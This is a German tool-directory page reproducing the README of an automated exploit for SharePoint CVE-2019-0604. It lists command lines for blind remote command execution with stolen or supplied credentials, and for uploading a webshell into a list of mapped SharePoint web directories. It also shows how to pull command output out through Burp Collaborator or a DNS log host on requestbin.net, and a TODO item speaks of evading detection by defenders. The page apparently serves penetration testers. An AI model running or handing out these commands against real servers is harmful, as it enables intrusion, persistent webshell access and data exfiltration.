Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/gh0st0ne/weaponized-0604
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubgh0st0ne/weaponized-0604

weaponized-0604

Automatisiertes Tool zur Ausnutzung von SharePoint CVE-2019-0604

Repository anzeigen
81vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Bewaffneter CVE-2019-0604

Automatisiertes Exploit-Tool zur Maximierung von CVE-2019-0604.

Voraussetzung

Die Datei requirements.txt sollte alle Python-Bibliotheken auflisten, die dieses Tool verwendet, und sie werden installiert mit

root@kitploit:~
$ pip install -r requirements.txt

Manueller Blind-Exploit (mit/ohne Anmeldedaten)

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -c whoami --ntlm -U <uname>:<passwd>

Upload-Funktion

lade alles Coole hoch (Webshell, Recon-Tool ...)

root@kitploit:~
Upload cmd.aspx to rcmd.aspx
--file-from /path/to/cmd.aspx --file-to /path/to/web_dir/rcmd.aspx

Verzeichniszuordnung

root@kitploit:~
Sharepoint Standard-Web-Virtualverzeichnis:
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_app_bin\ -> <target>/_app_bin/
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_vti_pvt\ -> <target>/_vti_pvt/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\layouts\ -> <target>/_layouts/15/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\controltemplates\ -> <target>/_controltemplates/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\login\ -> <target>/_login/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\windows\ -> <target>/_windows/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\wpresources\ -> <target>/_wpresources/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\isapi\ -> <target>/_vti_bin/

OOB nutzen, um Befehlsergebnis zu erhalten

Mit collaborator_http_api Burp-Erweiterung

  1. Installieren Sie collaborator_http_api.py in BurpSuite (Pro)?
  2. Stellen Sie sicher, dass BurpSuite auf demselben Rechner wie dieses Exploit läuft.
  3. Ausführen und die abgerufene Ausgabe genießen :)
root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -c whoami --collab --ntlm -U <uname>:<passwd>

sharepoint-rce-oob-demo

Mit DNSLog wie requestbin.net

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -r <path/to/reqFile> --oob 8486990041a11aaa43ce.d.requestbin.net -c "whoami /priv"

Daten von DNS abrufen

root@kitploit:~
2050524956494c4547455320494e464f524d4154494f4e
...

Von Ihnen selbst dekodiert :)

root@kitploit:~
 PRIVILEGES INFORMATION
...

TODO

  • Argument-Parser
  • SharePoint, CVE-2019-0604
  • Befehl in mehrere Teile aufteilen (in args.cmds)
  • Binärdatei nach Bedarf angeben, um Erkennung durch das Blue Team zu vermeiden. (Derzeit hartcodiert cmd.exe)

Autor

  • Tree
Tool herunterladen